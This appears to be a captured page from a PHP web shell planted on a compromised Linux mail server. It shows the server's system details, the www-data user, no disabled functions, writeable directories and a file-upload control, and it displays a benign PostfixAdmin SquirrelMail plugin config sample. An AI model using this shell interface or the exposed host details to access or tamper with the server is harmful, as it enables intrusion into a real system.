Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/mailsvr/padmin/ADDITIONS/squirrelmail-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/mailsvr/padmin/ADDITIONS/squirrelmail-plugin/config.php.sample
<?php

$CONF = array();
$CONF['xmlrpc_url'] = 'http://postfixadmin.local/postfixadmin/xmlrpc.php';

// Virtual Vacation
// If you use virtual vacation for you mailbox users set this to 'true'.
// NOTE: Make sure that you install the vacation module!!

//$AllowVacation = true;    // true or false
global $AllowVacation;
$AllowVacation = true;

// Change Password
// Enables user to change the POP3/IMAP Password.
//$AllowChangePass = true;    // true or false
global $AllowChangePass;
$AllowChangePass = true;

// Minimum password length - set to Zero to not care, otherwise the number of 
// characters a password must be longer than.
$CONF['min_password_length'] = 5;

Hry